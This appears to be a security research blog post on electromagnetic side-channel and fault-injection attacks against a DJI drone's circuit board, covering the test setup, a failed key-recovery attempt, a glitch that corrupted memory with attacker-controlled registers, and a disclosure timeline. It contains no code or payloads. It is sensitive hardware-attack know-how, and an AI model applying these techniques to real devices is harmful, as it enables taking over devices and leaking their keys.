Drones are used in a variety of applications, including military, commercial, and recreational. Like any other technology, drones are vulnerable to various types of attacks that can compromise their functionality and safety.

As illustrated above, drones expose several attack surfaces: (1) backend, (2) mobile apps, (3) radio frequency (RF) communication, and (4) physical device.

As detailed in the whitepaper, IOActive used EM emanations and EMFI due to their non-invasive nature. We leveraged Riscure products as the main tools for this research.

The image below shows the PCB under analysis after removal from the drone, with power connected to an external power supply.

First Approach

Our first approach was to attempt to retrieve the encryption key using EM emanations and decrypt the firmware. We started by finding an area on the drone's PCB with a strong EM signal so we could place a probe and record enough traces to extract the key.

After identifying the location with the strongest signal, we worked on understanding how to bypass the signature verification that takes place before the firmware is decrypted. After several days of testing and data analysis, we found that the probability of a successful signature bypass was less than 0.5%. This rendered key recovery infeasible, since it would have required us to collect tens of thousands of traces.

Second Approach

Our second approach was to use EMFI based on the ideas published by Riscure (https://www.riscure.com/publication/controlling-pc-arm-using-fault-injection). Riscure proposes using a glitch to cause one instruction to transform into another and gain control of, for example, the PC register. The following image shows the setup we used for this approach, which included a laptop (used as a controller), a power supply, Riscure’s Spider (used to generate the trigger), an oscilloscope, an XYZ table, and the EMFI pulse-generator.

After identifying a small enough area on the PCB, we modified the glitch’s shape and timing until we observed a successful result. The targeted process crashed, as shown below:  

Our payload appeared in several registers. After examining the code at the target address, we determined that we had hit a winning combination of timing, position, and glitch shape. The following capture shows the instruction where a segmentation error took place:

The capture clearly shows a load instruction copying our data to registers R0 and R1. In addition, the GDB output also shows that registers R3 and R4 ended up with controlled data. Further details can be found in the whitepaper.

Having successfully caused memory corruption, our next step would be to design a proper payload that achieves code execution. An attacker could use such an exploit to fully control a device, leak all sensitive content, enable ADB access, and potentially leak the encryption keys.

Disclosure Timeline

The DJI team's response was excellent: fast and supportive.

2023-04-04: Initial contact with DJI, including sharing the report.
2023-05-04: DJI agreed on a publication date.